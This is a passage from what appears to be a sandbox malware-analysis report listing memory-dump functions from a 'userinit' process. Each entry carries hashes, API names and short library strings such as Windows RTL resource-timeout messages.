                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 3bf565266642dc6dbf42f044afdcb878dcb47173d64cc09db59d229c685a60ab
                                                      • Instruction ID: d60b638742e79b2299128e9056bc4395a4d23e77828a68b47504f136bf247e8e
                                                      • Opcode Fuzzy Hash: 3bf565266642dc6dbf42f044afdcb878dcb47173d64cc09db59d229c685a60ab
                                                      • Instruction Fuzzy Hash: 3741EF75A10606AFDB20CE24CCC1F6AB7A9FF84711F14061AFC95AF680DB21E85287D1
                                                      Function 033D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 0e18e2073bf3335f2f27cae44fd3173628fec8d24435a16c3eaab6ccd3344105
                                                      • Instruction ID: 7259b663a606c2b0ba5f09efffcf2a7d003487331339f1132f74c51995356a10
                                                      • Opcode Fuzzy Hash: 0e18e2073bf3335f2f27cae44fd3173628fec8d24435a16c3eaab6ccd3344105
                                                      • Instruction Fuzzy Hash: 04317877A002199FCB24DF29DC80BEFB7F8EF44650F544555EC59E7240EB309A548BA0
                                                      Function 03367D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: b9eb1f633da6f91d85c6b3b510fc7ad473f8721411d2f73e2f830ab276c20e6f
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: B991B670E002169FDB24DF69CCC1ABEB7B9EF44724F98C61AE865EB2D8D73489418750
                                                      Function 03329126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 0980444341f727beed354d78687410712a9ede203984220c69b4aefac410f947
                                                      • Instruction ID: abd6ab763e8e3c1ce21060e86242c0bfb3779ca9d0dbc3b601b996171a243492
                                                      • Opcode Fuzzy Hash: 0980444341f727beed354d78687410712a9ede203984220c69b4aefac410f947
                                                      • Instruction Fuzzy Hash: ED812975D012699BDB21DF54CC84BEEB7B8AF09710F0445EAE919B7280D7709E84CFA0
                                                      Function 033ACEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 033ACFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 032f7d7fa067dccd2b767999174324da3fc2723dec0b4f7889455aeaa2db165b
                                                      • Instruction ID: 2d88d15ae8f37371ca6c187e212726f30dc63bbe372a48feac032b533f726755
                                                      • Opcode Fuzzy Hash: 032f7d7fa067dccd2b767999174324da3fc2723dec0b4f7889455aeaa2db165b
                                                      • Instruction Fuzzy Hash: A741BFB9D00A14DFCB21DF99C880AAEFBB8EF45710F05812AE914EF654D738C801DB64